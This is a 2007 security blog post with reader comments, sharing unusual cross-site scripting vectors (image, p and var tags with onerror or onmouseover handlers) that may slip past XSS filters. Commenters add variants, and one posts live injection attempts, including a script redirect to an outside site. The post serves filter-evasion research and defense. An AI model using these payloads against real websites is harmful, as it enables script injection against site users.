Unusual XSS vectors

Monday, 19 November 2007

I’ve been working on my Hackvertor script to include XSS fuzzing which isn’t ready yet but I thought you might be interested in a few interesting results I’ve found 🙂

First off I’m sure you know you can use XSS in a img object yeah? Well did you know there’s also a image object as well? It can be used like this:-

<image src="" onerror="alert(/XSS/)" />

Pretty neat eh? It may get round some XSS filters. It’s not in RSnake’s cheatsheet after a quick check.

Next up you can even inject Javascript into paragraph tags or obscure html tags like the following:-

<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>

Or what about this:-

<var onmouseover=alert(/XSS/)>Some very long paragraph goes here.</var>

Many other tags are supported using this method. That is all for now I hope you enjoyed this little post, I shall release my fuzzing research once the features have been completed in Hackvertor.

The entry 'Unusual XSS vectors' was posted on November 19th, 2007 at 10:42 am and last modified on January 6th, 2010 at 2:55 pm, and is filed under javascript, Security, xss. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

11 Responses to “Unusual XSS vectors”

  1. .mario writes:
    No. 1 — November 19th, 2007 at 12:30 pm

    Wow – the <image> issue is new indeed. The rest is just plain browser madness – Firefox in particular.

    <image/src onerror=alert(1)>

    Incredible… Nice find 🙂 I await the day when Hackvertor hs an API with itching fingers 😉

  2. Gareth Heyes writes:
    No. 2 — November 19th, 2007 at 12:35 pm

    Thanks Mario 🙂 I’ve registered a domain for Hackvertor and once I’ve finished the look behind matching and completed the fuzzing features I’ll start work on a API, which should be cool 😀

  3. Marcin writes:
    No. 3 — November 19th, 2007 at 4:31 pm

    Cool! I wrote a http://www.tssci-security.com/archives/2007/11/15/blacklisting-xss-filter-evasion-and-other-resources/ a couple days ago about using <img src=”” onerror=alert(/xss/)> in a site review.. Didn’t even realize there was an <image> element that works the same.

    I’m going to have to try the onmouseover attribute next time around.

    Mario’s is a nice one too… I’m building up my own little cheat sheet as I go along. Perhaps XSS Cheat Sheet could use an update.

    🙂

  4. .mario writes:
    No. 4 — November 19th, 2007 at 5:11 pm

    onwhatever 🙂

    http://www.w3schools.com/dhtml/dhtml_events.asp

    MSIE even features dozens of additional ones…

  5. Domber writes:
    No. 5 — November 22nd, 2007 at 11:51 am

    > It’s not in RSnake’s cheatsheet after a quick check.

    But in his Book 😉
    “Cross Site Scripting Attacks: Xss Exploits and Defense”

    HTH

  6. Gareth Heyes writes:
    No. 6 — November 22nd, 2007 at 12:13 pm

    @Domber

    He should update his cheatsheet then 🙂

  7. Reelix writes:
    No. 7 — August 4th, 2008 at 12:37 pm

    An XSS attempt 🙂

    <script>window.location = ‘http://www.reelic.za.net/’></script>

  8. Reelix writes:
    No. 8 — August 4th, 2008 at 12:37 pm

    ‘>”><script>alert(0)</script>

  9. Gareth Heyes writes:
    No. 9 — August 4th, 2008 at 1:30 pm

    @Reelix

    1. You’d be getting a XSS on wordpress and not me.
    2. You didn’t get XSS
    3. This is boring

  10. xss2root writes:
    No. 10 — August 15th, 2008 at 8:23 am

    some filter is based on the HTML syntax,it will remove all attributs like on*,remove some unsafe tags and so on.
    the filter just like a browser,and it’s safe much more.

  11. test writes:
    No. 11 — January 6th, 2010 at 1:32 pm

    <image src=”” onerror=”alert(/XSS/)” />

«
»